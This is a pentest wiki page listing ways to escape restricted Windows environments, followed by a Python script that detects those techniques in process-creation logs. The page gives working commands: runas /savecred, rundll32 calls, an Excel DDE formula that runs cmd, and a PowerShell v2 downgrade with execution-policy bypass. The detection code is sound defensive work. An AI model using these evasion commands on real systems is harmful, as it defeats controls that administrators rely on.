Escape environments

From pentestwiki.org

Escape Citrix or cmd.exe disabled by SRP

C:\>runas /savecred /user:<username> calc.exe


C:\>RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

e.g.:

C:\>rundll32.exe user32.dll,LockWorkStation


C:\>start cmd


Escape Excel

Excel command execution through a cell formula (a DDE link rather than a true "macro"):

=cmd|'/C calc.exe'!__xA1

[Screenshot: Excel evasion.jpg]

Escape PowerShell

PowerShell evasion inside "ConstrainedLanguage" mode:

  • Downgrade PowerShell to the v2 engine (ConstrainedLanguage mode is not enforced there)
    C:\>powershell.exe -Version 2 -ep bypass -nop
  • runas powershell?
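Added example, not from pentestwiki.org: process-creation telemetry checks that flag each of the escape techniques listed on this page (runas /savecred, Office spawning a shell via a DDE formula, the PowerShell v2 downgrade, and rundll32 loading a DLL from outside the Windows directory). The input is assumed to be a (ParentImage, Image, CommandLine) triple as Sysmon Event ID 1 or 4688 would supply; the sample events and rule names are constructed for this example.

```python
import re
from typing import Iterable

# Constructed sample events (not real telemetry): (ParentImage, Image, CommandLine)
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\runas.exe",
     "runas /savecred /user:CORP\\svc_backup calc.exe"),
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\System32\cmd.exe", "cmd /C calc.exe"),
    (r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Version 2 -ep bypass -nop"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
     "rundll32.exe user32.dll,LockWorkStation"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\Public\x.dll,Start"),
]

OFFICE = ("excel.exe", "winword.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Name the page's escape techniques that one process-creation event matches."""
    hits = []
    par, img, cl = basename(parent), basename(image), cmdline.lower()
    if img == "runas.exe" and "/savecred" in cl:
        hits.append("runas-savecred")  # launch via cached credentials
    if par in OFFICE and img in SHELLS:
        hits.append("office-dde-shell")  # =cmd|'/C ...'! style formula
    if img == "powershell.exe" and re.search(r"-v(?:ersion)?\s+2\b", cl):
        hits.append("powershell-v2-downgrade")  # v2 engine does not enforce ConstrainedLanguage
    if img == "rundll32.exe":
        m = re.search(r"rundll32(?:\.exe)?\s+(\S+?),", cl)
        dll = m.group(1) if m else ""
        # A bare name (user32.dll) resolves to System32; a full path elsewhere is suspicious.
        if "\\" in dll and not dll.startswith("c:\\windows\\"):
            hits.append("rundll32-nonsystem-dll")
    return hits

def scan(events: Iterable[tuple[str, str, str]]) -> dict[int, list[str]]:
    """Map event index -> matched techniques, skipping events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(*e))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx][2], "->", ", ".join(hits))
```

The benign events (a plain cmd /c dir and the LockWorkStation call with a bare DLL name) produce no hits, so the rules can be tuned against real parent/child pairs without alerting on every rundll32 launch.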